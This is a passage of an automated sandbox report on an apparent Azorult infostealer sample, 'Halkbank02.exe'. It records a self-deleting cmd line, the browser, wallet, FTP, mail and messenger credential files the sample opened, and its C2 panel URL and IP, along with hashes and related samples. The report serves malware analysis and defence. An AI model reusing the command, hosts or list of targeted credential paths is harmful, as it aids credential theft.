      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A608C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A352D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9745 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8150 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A41F0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A7382 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\Halkbank02.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Desktop\Halkbank02.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected AzorultShow sources
      Source: Yara matchFile source: 0000001C.00000002.900879617.000000001F410000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000002.900905974.000000001F43C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Halkbank02.exe PID: 5680, type: MEMORYSTR
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Tries to steal Crypto Currency WalletsShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
      Tries to harvest and steal ftp login credentialsShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
      Tries to harvest and steal Bitcoin Wallet informationShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
      Tries to steal Mail credentials (via file access)Show sources
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      Tries to steal Instant Messenger accounts or passwordsShow sources
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\Desktop\Halkbank02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection11Virtualization/Sandbox Evasion22OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11Credentials in Registry2Virtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials In Files1Process Discovery11SMB/Windows Admin SharesData from Local System3Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery134VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 483639 Sample: Halkbank02.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 36 Potential malicious icon found 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 8 Halkbank02.exe 2->8         started        process3 signatures4 44 Self deletion via cmd delete 8->44 46 Tries to detect Any.run 8->46 48 Tries to detect virtualization through RDTSC time measurements 8->48 50 Hides threads from debuggers 8->50 11 Halkbank02.exe 67 8->11         started        process5 dnsIp6 30 31.210.20.16, 49826, 49827, 80 PLUSSERVER-ASN1DE Netherlands 11->30 32 googlehosted.l.googleusercontent.com 172.217.168.65, 443, 49825 GOOGLEUS United States 11->32 34 2 other IPs or domains 11->34 22 C:\Users\user\AppData\...\vcruntime140.dll, PE32 11->22 dropped 24 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 11->24 dropped 26 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 11->26 dropped 28 45 other files (none is malicious) 11->28 dropped 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->52 54 Tries to steal Instant Messenger accounts or passwords 11->54 56 Tries to steal Mail credentials (via file access) 11->56 58 7 other signatures 11->58 16 cmd.exe 1 11->16         started        file7 signatures8 process9 process10 18 conhost.exe 16->18         started        20 timeout.exe 1 16->20         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Halkbank02.exe14%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://ocsp.thawte.com00%URL Reputationsafe
      http://www.mozilla.com00%URL Reputationsafe
      http://31.210.20.16/panel1/index.php2%VirustotalBrowse
      http://31.210.20.16/panel1/index.php0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.168.78
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		172.217.168.65
        		truefalse
          		high
          doc-0g-c0-docs.googleusercontent.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://31.210.20.16/panel1/index.phpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://doc-0g-c0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=downloadfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=204641256101765428455219.tmp.28.drfalse
                		high
                https://duckduckgo.com/chrome_newtab204641256101765428455219.tmp.28.drfalse
                  		high
                  http://www.mozilla.com/en-US/blocklist/mozglue.dll.28.drfalse
                    		high
                    https://duckduckgo.com/ac/?q=204641256101765428455219.tmp.28.drfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico204641256101765428455219.tmp.28.drfalse
                        		high
                        http://crl.thawte.com/ThawteTimestampingCA.crl0Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drfalse
                          		high
                          http://www.msn.com/de-ch/Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpfalse
                            		high
                            http://ocsp.thawte.com0Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.mozilla.com0Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.com/chrome/thank-you.htmlHalkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=204641256101765428455219.tmp.28.drfalse
                                		high
                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search204641256101765428455219.tmp.28.drfalse
                                  		high
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=204641256101765428455219.tmp.28.drfalse
                                    		high
                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=204641256101765428455219.tmp.28.drfalse
                                      		high

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      172.217.168.78
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      172.217.168.65
                                      		googlehosted.l.googleusercontent.comUnited States
                                      		15169GOOGLEUSfalse
                                      31.210.20.16
                                      		unknownNetherlands
                                      		61157PLUSSERVER-ASN1DEfalse

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:483639
                                      Start date:15.09.2021
                                      Start time:10:46:43
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 16m 24s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:Halkbank02.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Run name:Suspected Instruction Hammering Hide Perf
                                      Number of analysed new started processes analysed:39
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.rans.phis.troj.spyw.evad.winEXE@8/53@2/3
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 36.4% (good quality ratio 7.9%)
                                      • Quality average: 11.5%
                                      • Quality standard deviation: 24.6%
                                      HCA Information:
                                      • Successful, ratio: 69%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 92.122.145.220, 23.35.236.56, 67.27.159.126, 8.248.145.254, 67.26.73.254, 67.27.233.126, 8.248.139.254, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 40.126.31.141, 40.126.31.137, 40.126.31.8, 20.190.159.134, 40.126.31.143, 20.190.159.138, 40.126.31.1, 40.126.31.135, 20.49.150.241, 51.104.136.2, 20.73.194.208, 23.203.69.124, 23.203.67.116, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e1553.dspg.akamaiedge.net, dub2.next.a.prd.aadg.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      31.210.20.16Halkbank01.exeGet hashmaliciousBrowse
                                      • 31.210.20.16/panel1/index.php
                                      HALKBANK01.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel1/index.php
                                      # 310573418 nuevo orden.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/creep/index.php
                                      Rally RadiatorsREQUEST.pdf.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel/index.php
                                      PO 1210.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel1/index.php
                                      bin.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel/index.php
                                      20210909161956_00023,pdf.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/creep/index.php
                                      PO 12501.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel1/index.php
                                      X4lLneI8ZK.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/panel/index.php
                                      RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/creep/index.php
                                      RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
                                      • smdglo.xyz/creep/index.php

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      PLUSSERVER-ASN1DEHalkbank01.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      PO-14092021.docGet hashmaliciousBrowse
                                      • 31.210.20.61
                                      PO-14092021.docGet hashmaliciousBrowse
                                      • 31.210.20.61
                                      HALKBANK01.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      Purchase Order-PU0955387.exeGet hashmaliciousBrowse
                                      • 31.210.20.4
                                      P2021-09-13 CIW01130192.exeGet hashmaliciousBrowse
                                      • 31.210.20.22
                                      # 310573418 nuevo orden.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      Rally RadiatorsREQUEST.pdf.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      ddc0dNOK0y.exeGet hashmaliciousBrowse
                                      • 31.210.20.22
                                      PO 1210.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      XnLs7VLx1vGet hashmaliciousBrowse
                                      • 91.250.109.135
                                      bin.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      20210909161956_00023,pdf.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      PO 12501.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      X4lLneI8ZK.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      RFQ_PARTS PRICELIST 110-10007046,pdf.exeGet hashmaliciousBrowse
                                      • 31.210.20.16
                                      ROHmSaAAiGGet hashmaliciousBrowse
                                      • 62.138.80.204
                                      Bxs1wBHcNS.exeGet hashmaliciousBrowse
                                      • 31.210.20.251
                                      raoSkUREqo.exeGet hashmaliciousBrowse
                                      • 31.210.20.251

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      37f463bf4616ecd445d4a1937da06e19DlZa7n6PjI.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      7Tat85Af0C.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      86jLEXtwqR.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      6WtKevhqlg.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      oLn3NAKPzu.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      hd9uHo4dot.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      47U9eIz5bG.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      x13NYP60fd.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      #Ud83d#Udd09_ 3pm.htmlGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      HSBC Customer Information.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      aZq3gco8Ab.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      Medical-Engagement-Scale-Questionnaire.msiGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      setup_x86_x64_install.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      CI and PL of CMZBD-210090.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      Aplieco_6635.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      egQIhpn3UW.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65
                                      4J1sKiGm0T.exeGet hashmaliciousBrowse
                                      • 172.217.168.78
                                      • 172.217.168.65

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllgunzipped.exeGet hashmaliciousBrowse
                                        Halkbank01.exeGet hashmaliciousBrowse
                                          gunzipped.exeGet hashmaliciousBrowse
                                            PO#55091269.exeGet hashmaliciousBrowse
                                              purchase invoice.exeGet hashmaliciousBrowse
                                                HALKBANK01.exeGet hashmaliciousBrowse
                                                  #U00f6deme-13.09.2021.exeGet hashmaliciousBrowse
                                                    # 310573418 nuevo orden.exeGet hashmaliciousBrowse
                                                      Rally RadiatorsREQUEST.pdf.exeGet hashmaliciousBrowse
                                                        F2kvZ2vpfP.exeGet hashmaliciousBrowse
                                                          37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exeGet hashmaliciousBrowse
                                                            PO 1210.exeGet hashmaliciousBrowse
                                                              Payment slip.exeGet hashmaliciousBrowse
                                                                bin.exeGet hashmaliciousBrowse
                                                                  Oferta de produto 74675673748.jarGet hashmaliciousBrowse
                                                                    4098765432345678987654345678 .jarGet hashmaliciousBrowse
                                                                      20210909161956_00023,pdf.exeGet hashmaliciousBrowse
                                                                        PO 12501.exeGet hashmaliciousBrowse
                                                                          X4lLneI8ZK.exeGet hashmaliciousBrowse
                                                                            A0J09876543234567890-0987654323456789.jarGet hashmaliciousBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\204637655311736975788903.tmp
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.792852251086831
                                                                              Encrypted:false
                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2046401572453255596126.tmp
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):0.6970840431455908
                                                                              Encrypted:false
                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                              MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                              SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                              SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                              SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                              Malicious:false
                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\204641256101765428455219.tmp
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                              Category:dropped
                                                                              Size (bytes):73728
                                                                              Entropy (8bit):1.1874185457069584
                                                                              Encrypted:false
                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                              Malicious:false
                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\204641713610661291261139.tmp
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                              Category:dropped
                                                                              Size (bytes):73728
                                                                              Entropy (8bit):1.1874185457069584
                                                                              Encrypted:false
                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                              Malicious:false
                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2046426522414009277435.tmp
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                              Category:dropped
